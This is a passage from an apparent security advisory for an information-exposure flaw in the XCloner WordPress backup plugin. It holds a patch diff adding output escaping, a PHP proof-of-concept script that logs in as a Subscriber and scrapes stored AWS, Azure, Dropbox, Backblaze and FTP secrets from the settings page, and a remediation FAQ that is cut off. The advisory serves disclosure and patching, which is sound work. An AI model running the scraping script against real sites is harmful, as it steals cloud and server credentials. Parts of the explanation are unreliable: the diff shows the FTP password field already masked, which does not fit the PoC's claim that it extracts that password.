                    type="text" name="xcloner_ftp_password" class="validate"
                    value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_ftp_password")))) ?>"
                    autocomplete="off">
@@ -68,10 +68,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_root"><?php echo __("Ftp Storage Folder", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_root"><?php echo esc_html__("Ftp Storage Folder", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Ftp Storage Folder", 'xcloner-backup-and-restore') ?>" id="ftp_root"
+            <input placeholder="<?php echo esc_html__("Ftp Storage Folder", 'xcloner-backup-and-restore') ?>" id="ftp_root"
                    type="text" name="xcloner_ftp_path" class="validate"
                    value="<?php echo esc_attr(urldecode(get_option("xcloner_ftp_path") ?: '')) ?>">
         </div>
@@ -79,7 +79,7 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_root"><?php echo __("Ftp Transfer Mode", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_root"><?php echo esc_html__("Ftp Transfer Mode", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6 input-field inline">
             <p>
@@ -88,7 +88,7 @@
                            value="1" <?php if (get_option("xcloner_ftp_transfer_mode", 1)) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Passive", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Passive", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
             <p>
@@ -97,7 +97,7 @@
                            value="0" <?php if (!get_option("xcloner_ftp_transfer_mode", 1)) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Active", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Active", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
         </div>
@@ -105,7 +105,7 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_ssl_mode"><?php echo __("Ftp Secure Connection", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_ssl_mode"><?php echo esc_html__("Ftp Secure Connection", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6 input-field inline">
             <p>
@@ -114,7 +114,7 @@
                            value="0" <?php if (!get_option("xcloner_ftp_ssl_mode")) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Disable", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Disable", 'xcloner-backup-and-restore') ?></span>
                 </label></p>
             <p>
                 <label for="ftp_ssl_mode_active">
@@ -122,34 +122,34 @@
                            value="1" <?php if (get_option("xcloner_ftp_ssl_mode")) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Enable", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Enable", 'xcloner-backup-and-restore') ?></span>
                 </label></p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_timeout"><?php echo __("Ftp Timeout", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_timeout"><?php echo esc_html__("Ftp Timeout", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m2">
-            <input placeholder="<?php echo __("Ftp Timeout", 'xcloner-backup-and-restore') ?>" id="ftp_timeout"
+            <input placeholder="<?php echo esc_html__("Ftp Timeout", 'xcloner-backup-and-restore') ?>" id="ftp_timeout"
                    type="text" name="xcloner_ftp_timeout" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_ftp_timeout", 30)) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('ftp') ?>
+    <?php echo common_cleanup_html('ftp') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                    value="ftp"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                    value="ftp"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="ftp"
-                    onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                    onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/gdrive.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/gdrive.php
@@ -15,7 +15,7 @@
 $gdrive_construct = $remote_storage->gdrive_construct();
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Google Drive Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Google Drive Storage", 'xcloner-backup-and-restore') ?>
     <?php if ($gdrive_construct): ?>
     <div class="switch right">
         <label>
@@ -39,7 +39,7 @@
         </div>
         <div class=" col s12 m9">
             <p>
-                <?php echo sprintf(__('Click the Google Sign-in button below to complete the 1-time integration.'));  ?>
+                <?php echo sprintf(__('Click the Google Sign-in button below to complete the 1-time integration.', 'xcloner-backup-and-restore')); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
             </p>
         </div>
     </div>
@@ -52,37 +52,37 @@
             <a class="" target="_blank" id="gdrive_authorization_click"
                 onclick="jQuery('#authentification_code').show()"
                 href="<?php echo esc_url($gdrive_auth_url) ?>">
-                <img src="<?php echo plugin_dir_url(__DIR__)?>/../../assets/btn_google_signin_dark_pressed_web.png"
-                alt="<?php echo sprintf(__('Authorize Google Drive', 'xcloner-backup-and-restore')) ?>"/>
+                <img src="<?php echo esc_url(plugin_dir_url(__DIR__))?>/../../assets/btn_google_signin_dark_pressed_web.png"
+                alt="<?php echo sprintf(__('Authorize Google Drive', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>"/>
                 </a>
             <input type="text" name="authentification_code" id="authentification_code"
-                placeholder="<?php echo __("Paste Authorization Code Here", "xcloner-backup-and-restore") ?>">
+                placeholder="<?php echo esc_html__("Paste Authorization Code Here", "xcloner-backup-and-restore") ?>">
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="gdrive_target_folder"><?php echo __("Folder ID or Root Path", 'xcloner-backup-and-restore') ?>
+            <label for="gdrive_target_folder"><?php echo esc_html__("Folder ID or Root Path", 'xcloner-backup-and-restore') ?>
                 <a class="btn-floating tooltipped btn-small" data-position="right" data-delay="50" data-html="true" 
-                    data-tooltip="<?php echo __('Folder ID can be found by right clicking on the folder name and selecting 'Get shareable link' menu, format https://drive.google.com/open?id={FOLDER_ID}<br />
+                    data-tooltip="<?php echo esc_html__('Folder ID can be found by right clicking on the folder name and selecting 'Get shareable link' menu, format https://drive.google.com/open?id={FOLDER_ID}<br />
 									If you supply a folder name, it has to exists in the drive root and start with / , example /backups.xcloner.com/', 'xcloner-backup-and-restore') ?>"
                     data-tooltip-id="92c95730-94e9-7b59-bd52-14adc30d5e3e"><i
                         class="material-icons">help_outline</i></a>
             </label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Target Folder ID or Root Path", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Target Folder ID or Root Path", 'xcloner-backup-and-restore') ?>"
                 id="gdrive_target_folder" type="text" name="xcloner_gdrive_target_folder" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_gdrive_target_folder")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('gdrive')?>
+    <?php echo common_cleanup_html('gdrive') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="gdrive_empty_trash"><?php echo __("Automatically Empty Trash?", 'xcloner-backup-and-restore') ?></label>
+                for="gdrive_empty_trash"><?php echo esc_html__("Automatically Empty Trash?", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6 input-field inline">
             <p>
@@ -90,7 +90,7 @@
                     <input name="xcloner_gdrive_empty_trash" type="radio" value="0" id="gdrive_empty_trash_off" <?php if (!get_option("xcloner_gdrive_empty_trash", 0)) {
                                         echo "checked";
                                     } ?> />
-                    <span><?php echo __("Disabled", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Disabled", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
             <p>
@@ -98,7 +98,7 @@
                     <input name="xcloner_gdrive_empty_trash" type="radio" value="1" id="gdrive_empty_trash_on" <?php if (get_option("xcloner_gdrive_empty_trash", 0)) {
                                         echo "checked";
                                     } ?> />
-                    <span><?php echo __("Enabled", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Enabled", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
         </div>
@@ -107,13 +107,13 @@
     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="gdrive"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="gdrive"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="gdrive"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
@@ -126,22 +126,22 @@
                 <?php
                                         $url = wp_nonce_url(self_admin_url('update.php?action=install-plugin&plugin=xcloner-google-drive'), 'install-plugin_xcloner-google-drive');
                                         ?>
-                <h6><?php echo __("This storage option requires the XCloner-Google-Drive Wordpress Plugin to be installed and activated.") ?>
+                <h6><?php echo esc_html__("This storage option requires the XCloner-Google-Drive Wordpress Plugin to be installed and activated.", 'xcloner-backup-and-restore') ?>
                 </h6>
-                <h6><?php echo __("PHP 5.5 minimum version is required.") ?></h6>
+                <h6><?php echo esc_html__("PHP 5.5 minimum version is required.", 'xcloner-backup-and-restore') ?></h6>
                 <br />
                 <a class="install-now btn" data-slug="xcloner-google-drive" href="<?php echo esc_url($url); ?>"
                     aria-label="Install XCloner Google Drive 1.0.0 now" data-name="XCloner Google Drive 1.0.0">
-                    <?php echo sprintf(__('Install Now', 'xcloner-backup-and-restore')) ?>
+                    <?php echo sprintf(__('Install Now', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
                 </a>

-                <a href="<?php echo admin_url("plugin-install.php") ?>?tab=plugin-information&plugin=xcloner-google-drive&TB_iframe=true&width=772&height=499"
+                <a href="<?php echo esc_url(admin_url("plugin-install.php")) ?>?tab=plugin-information&plugin=xcloner-google-drive&TB_iframe=true&width=772&height=499"
                     class="btn thickbox open-plugin-details-modal"
                     aria-label="More information about Theme Check 20160523.1" data-title="Theme Check 20160523.1">
                     <!--
 											<a class="btn" href="https://github.com/ovidiul/XCloner-Google-Drive/archive/master.zip">
 											-->
-                    <?php echo sprintf(__('More Details', 'xcloner-backup-and-restore')) ?>
+                    <?php echo sprintf(__('More Details', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
                 </a>
             </div>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/local.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/local.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Local Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Local Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -19,10 +19,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_key"><?php echo __("Backup Start Location", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_key"><?php echo esc_html__("Backup Start Location", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backup Start Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
+            <input placeholder="<?php echo esc_html__("Backup Start Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
                 type="text" name="xcloner_start_path" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_start_path")) ?>" autocomplete="off">
         </div>
@@ -30,27 +30,27 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_key"><?php echo __("Backup Storage Location", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_key"><?php echo esc_html__("Backup Storage Location", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backup Storage Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
+            <input placeholder="<?php echo esc_html__("Backup Storage Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
                 type="text" name="xcloner_store_path" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_store_path")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('local')?>
+    <?php echo common_cleanup_html('local') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="local"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="local"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="local"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/onedrive.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/onedrive.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("OneDrive Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("OneDrive Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -25,18 +25,20 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit <a href="%s" target="_blank">Microsoft Azure App Registrations</a> and get your Client ID and Client Secret. More details on setting up the code flow authentication can be found <a href="%s">here</a>.
-                                    Make sure to also add the %s to the Authentication->Redirect URIs area', 'xcloner-backup-and-restore'), 'https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationsListBlade', 'https://docs.microsoft.com/en-us/onedrive/developer/rest-api/getting-started/graph-oauth?view=odsp-graph-online#code-flow', get_admin_url()) ?>
+                <?php // phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped, WordPress.WP.I18n.MissingTranslatorsComment, WordPress.WP.I18n.UnorderedPlaceholdersText
+                echo sprintf(__('Visit <a href="%s" target="_blank">Microsoft Azure App Registrations</a> and get your Client ID and Client Secret. More details on setting up the code flow authentication can be found <a href="%s">here</a>.
+                                    Make sure to also add the %s to the Authentication->Redirect URIs area', 'xcloner-backup-and-restore'), 'https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationsListBlade', 'https://docs.microsoft.com/en-us/onedrive/developer/rest-api/getting-started/graph-oauth?view=odsp-graph-online#code-flow', get_admin_url());
+                // phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped, WordPress.WP.I18n.MissingTranslatorsComment, WordPress.WP.I18n.UnorderedPlaceholdersText ?>
             </p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="onedrive_client_id"><?php echo __("OneDrive Client ID", 'xcloner-backup-and-restore') ?></label>
+            <label for="onedrive_client_id"><?php echo esc_html__("OneDrive Client ID", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("OneDrive Client ID", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("OneDrive Client ID", 'xcloner-backup-and-restore') ?>"
                 id="onedrive_client_id" type="text" name="xcloner_onedrive_client_id" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_onedrive_client_id")) ?>" autocomplete="off">
         </div>
@@ -45,10 +47,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="onedrive_client_secret"><?php echo __("OneDrive Client Secret", 'xcloner-backup-and-restore') ?></label>
+                for="onedrive_client_secret"><?php echo esc_html__("OneDrive Client Secret", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("OneDrive Client Secret", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("OneDrive Client Secret", 'xcloner-backup-and-restore') ?>"
                 id="onedrive_client_secret" type="text" name="xcloner_onedrive_client_secret" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_onedrive_client_secret")))) ?>"
                 autocomplete="off">
@@ -62,34 +64,34 @@
         <div class=" col s12 m6">
             <a class="btn" target="_blank" id="onedrive_authorization_click" onclick="jQuery(this).attr('href', jQuery(this).attr('target_href') + '&client_id=' + jQuery('#onedrive_client_id').val());
                                        jQuery('.onedrive-action').click()" href="#"
-                target_href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?scope=offline_access files.readwrite.all  files.read files.read.all files.readwrite&response_type=code&redirect_uri=<?php echo get_admin_url('')?>"><?php echo sprintf(__('Authorize OneDrive', 'xcloner-backup-and-restore')) ?></a>
+                target_href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?scope=offline_access files.readwrite.all  files.read files.read.all files.readwrite&response_type=code&redirect_uri=<?php echo esc_url(get_admin_url(''))?>"><?php echo sprintf(__('Authorize OneDrive', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?></a>

         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="onedrive_path"><?php echo __("OneDrive Storage Folder", 'xcloner-backup-and-restore') ?></label>
+            <label for="onedrive_path"><?php echo esc_html__("OneDrive Storage Folder", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("OneDrive Storage Folder Path", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("OneDrive Storage Folder Path", 'xcloner-backup-and-restore') ?>"
                 id="onedrive_path" type="text" name="xcloner_onedrive_path" class="validate"
                 value="<?php echo esc_attr(urldecode(get_option("xcloner_onedrive_path") ?: '')) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('onedrive')?>
+    <?php echo common_cleanup_html('onedrive') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light onedrive-action" type="submit" name="action" id="action"
-                value="onedrive"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="onedrive"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="onedrive"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/sftp.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/sftp.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("SFTP Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("SFTP Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -23,15 +23,15 @@
 <div class="collapsible-body">
     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_host"><?php echo __("SFTP Hostname", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_host"><?php echo esc_html__("SFTP Hostname", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class="col s12 m6">
-            <input placeholder="<?php echo __("SFTP Hostname", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Hostname", 'xcloner-backup-and-restore') ?>"
                    id="sftp_host" type="text" name="xcloner_sftp_hostname" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_sftp_hostname")) ?>">
         </div>
         <div class=" col s12 m2">
-            <input placeholder="<?php echo __("SFTP Port", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Port", 'xcloner-backup-and-restore') ?>"
                    id="sftp_port" type="text" name="xcloner_sftp_port" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_sftp_port", 22)) ?>">
         </div>
@@ -39,10 +39,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_username"><?php echo __("SFTP Username", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_username"><?php echo esc_html__("SFTP Username", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("SFTP Username", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Username", 'xcloner-backup-and-restore') ?>"
                    id="sftp_username" type="text" name="xcloner_sftp_username" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_sftp_username")) ?>" autocomplete="off">
         </div>
@@ -51,10 +51,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_password"><?php echo __("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_password"><?php echo esc_html__("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?>"
                    id="ftp_spassword" type="text" name="xcloner_sftp_password" class="validate"
                    value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_sftp_password")))) ?>"
                    autocomplete="off">
@@ -63,11 +63,11 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_private_key"><?php echo __("SFTP Private Key(RSA)", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_private_key"><?php echo esc_html__("SFTP Private Key(RSA)", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
                                 <textarea rows="5"
-                                          placeholder="<?php echo __("Local Server Path or Contents of the SFTP Private Key RSA File", 'xcloner-backup-and-restore') ?>"
+                                          placeholder="<?php echo esc_html__("Local Server Path or Contents of the SFTP Private Key RSA File", 'xcloner-backup-and-restore') ?>"
                                           id="sftp_private_key" type="text" name="xcloner_sftp_private_key"
                                           class="validate"
                                           value=""><?php echo esc_attr(get_option("xcloner_sftp_private_key")) ?></textarea>
@@ -76,10 +76,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_root"><?php echo __("SFTP Storage Folder", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_root"><?php echo esc_html__("SFTP Storage Folder", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("SFTP Storage Folder", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Storage Folder", 'xcloner-backup-and-restore

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48965 - Backup, Restore and Migrate your sites with XCloner <= 4.8.6 - Authenticated (Subscriber+) Information Exposure

// Set target WordPress URL and credentials
$target_url = 'http://wordpress.local';
$username = 'subscriber';
$password = 'subscriber_password';

// Step 1: Login as subscriber
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
)));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

// Step 2: Access the XCloner settings page where secrets are displayed
$admin_url = $target_url . '/wp-admin/admin.php?page=xcloner_backup_and_restore';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);

// Step 3: Extract secrets from the HTML
$pattern = '/<input[^>]*name="xcloner_aws_secret"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "AWS Secret: " . $matches[1] . "n";
}

$pattern = '/<input[^>]*name="xcloner_azure_api_key"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "Azure API Key: " . $matches[1] . "n";
}

$pattern = '/<input[^>]*name="xcloner_dropbox_app_secret"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "Dropbox App Secret: " . $matches[1] . "n";
}

$pattern = '/<input[^>]*name="xcloner_backblaze_application_key"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "Backblaze Application Key: " . $matches[1] . "n";
}

$pattern = '/<input[^>]*name="xcloner_ftp_password"[^>]*value="([^"]+)"[^>]*>/i';
preg_match($pattern, $response, $matches);
if (isset($matches[1])) {
    echo "FTP Password: " . $matches[1] . "n";
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-48965?
Overview of the vulnerability
CVE-2026-48965 is a medium-severity vulnerability affecting the XCloner Backup, Restore and Migrate plugin for WordPress, specifically versions up to and including 4.8.6. It allows authenticated attackers with Subscriber-level access or higher to expose sensitive information stored in the WordPress options tables.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the use of unsafe output functions in the plugin’s admin panel, which can lead to sensitive data exposure. Attackers can access backend pages that display secrets, such as API keys and user credentials, in plain text due to improper escaping of output.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the XCloner Backup, Restore and Migrate plugin version 4.8.6 or earlier is affected. Specifically, authenticated users with Subscriber-level access or above can exploit this vulnerability to extract sensitive information.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the XCloner plugin installed on your WordPress site. If it is version 4.8.6 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Steps to mitigate the issue
The vulnerability can be fixed by updating the XCloner plugin to version 4.8.7 or later, which includes a patch that replaces unsafe output functions with properly escaped alternatives. Regularly updating all plugins is essential for maintaining site security.
What does the CVSS score of 4.3 indicate?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure if exploited. Administrators should take this seriously and apply necessary updates.
What kind of sensitive information is exposed?
Types of data at risk
The vulnerability can expose sensitive configuration data such as AWS keys, Dropbox tokens, Azure API keys, and FTP passwords. This information can be exploited for unauthorized access to external services and data exfiltration.
What does the proof of concept demonstrate?
Understanding the exploitation process
The proof of concept illustrates how an authenticated attacker can log in as a Subscriber and access the XCloner settings page to view sensitive information. It highlights the steps taken to exploit the vulnerability and the potential impact on site security.
What are the implications of data exposure?
Risks associated with the vulnerability
If sensitive information is exposed, it can lead to unauthorized access to cloud storage accounts, data manipulation, or further attacks on the affected site. This can compromise the integrity and confidentiality of the site’s data.
How can I protect my site from similar vulnerabilities in the future?
Best practices for WordPress security
To protect your site, regularly update all plugins and themes, conduct security audits, and implement security measures such as firewalls and monitoring tools. Additionally, limit user permissions and use strong authentication methods.
Is there a way to report this vulnerability?
